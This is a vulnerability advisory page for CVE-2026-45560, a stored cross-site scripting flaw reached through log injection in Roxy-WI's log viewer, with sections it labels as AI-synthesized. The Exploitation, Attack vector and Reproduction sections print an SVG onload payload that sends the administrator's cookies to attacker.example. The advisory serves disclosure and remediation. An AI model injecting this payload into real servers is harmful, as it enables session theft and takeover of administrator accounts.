VYPR
Medium severity (6.1) · NVD Advisory · Published Jun 10, 2026 · Updated Jun 10, 2026

CVE-2026-45560

Description

Roxy-WI versions prior to 8.2.6.4 are vulnerable to stored XSS via log injection, allowing attackers to execute code in admin sessions.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Roxy-WI versions 8.2.6.4 and prior contain a stored cross-site scripting (XSS) vulnerability in the log viewer functionality. The wrap_line and highlight_word functions in app/modules/common/common.py construct raw HTML via string concatenation without proper escaping. The frontend JavaScript then injects this unescaped HTML into the log viewer page using .html(data) or .append(data) [1].

Exploitation

An attacker can exploit this vulnerability by sending an HTTP request to a Roxy-WI managed HAProxy or Nginx server. The request's User-Agent header, or any other field that gets logged, can contain an SVG payload such as <svg/onload=fetch('https://attacker.example/x?c='+document.cookie)>. This malicious string is written into the server's access log. When a Roxy-WI administrator views the logs through the web interface, the embedded SVG payload is rendered and executed within the administrator's browser session [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript code within the context of a Roxy-WI administrator's session. This leads to a full compromise of the application state, as the attacker gains the same privileges and access as the administrator. The stolen cookie may include session references, potentially enabling further escalation attacks [1].

Mitigation

At the time of publication, there are no publicly available patches for this vulnerability. The recommended fix involves using Jinja's auto-escaping for log content. Users are advised to monitor for updates from the vendor. This vulnerability is listed in the GitHub advisory [1].

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0. No patches discovered yet.

Vulnerability mechanics

Root cause

"The `wrap_line` and `highlight_word` functions construct HTML by concatenating strings without proper escaping, leading to cross-site scripting vulnerabilities."

Attack vector

An attacker can send an HTTP request to a Roxy-WI managed HAProxy or Nginx server, injecting malicious HTML, such as `<svg/onload=fetch('https://attacker.example/x?c='+document.cookie)>`, into a log field like the User-Agent. This payload is then written into the server's access logs. When a Roxy-WI administrator views these logs through the web interface, the injected SVG element is rendered, executing the JavaScript payload in the admin's browser context [1].

Affected code

The vulnerability resides in the `wrap_line` and `highlight_word` functions located in `app/modules/common/common.py` at lines 181-192. These functions are called by `show_log` in `app/modules/roxywi/logs.py` to process log lines. The frontend JavaScript, particularly in `app/static/js/script.js` for log viewer paths, consumes this output unsafely using `.html(data)` or `.append(data)` [1].

What the fix does

The advisory indicates that patches involve using Jinja's auto-escaping for log content and rendering via Jinja templates instead of direct string concatenation. Specifically, the `wrap_line` and `highlight_word` functions should escape both the content and CSS classes before returning them as `Markup` objects. The frontend should then use `.text()` and CSS classes instead of `.html()` or `.append()` to prevent arbitrary HTML injection [1]. No patch is publicly available at the time of this report.

Preconditions

  • Network: The attacker must be able to send HTTP requests to the public-facing HAProxy/Nginx server managed by Roxy-WI.
  • Input: The attacker must be able to inject unescaped HTML into a field that gets logged by HAProxy/Nginx, such as the User-Agent header.
  • Auth: No authentication is required for the attacker to inject the payload into the logs.

Reproduction

As an attacker, send an HTTP request whose User-Agent (or any logged field) contains: User-Agent: <svg/onload="fetch('https://attacker.example/x?c='+document.cookie)">

The line lands in the HAProxy/Nginx access log on a Roxy-WI-managed server. A Roxy-WI admin opens Logs → HAProxy → . The browser receives: <div class="line">… UA="<svg/onload=...>". The <svg> payload runs in the admin's session [1].

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1
